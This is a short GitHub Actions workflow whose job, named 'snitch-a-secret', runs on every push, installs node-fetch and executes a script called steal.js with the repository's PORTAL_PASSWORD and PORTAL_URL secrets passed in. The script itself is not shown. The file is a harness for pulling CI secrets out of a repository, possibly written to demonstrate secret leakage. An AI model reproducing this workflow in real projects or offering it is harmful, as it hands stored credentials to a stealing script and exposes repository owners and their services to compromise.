on: [push]

jobs:
    snitch-a-secret:
        runs-on: ubuntu-latest

        steps:
            - uses: actions/checkout@v2

            - uses: actions/setup-node@v1

            - run: yarn install
            - run: npm i node-fetch

            - run: node ./steal.js
              env:
                  PORTAL_PASSWORD : ${{ secrets.PORTAL_PASSWORD }}
                  PORTAL_URL :   ${{ secrets.PORTAL_URL }}
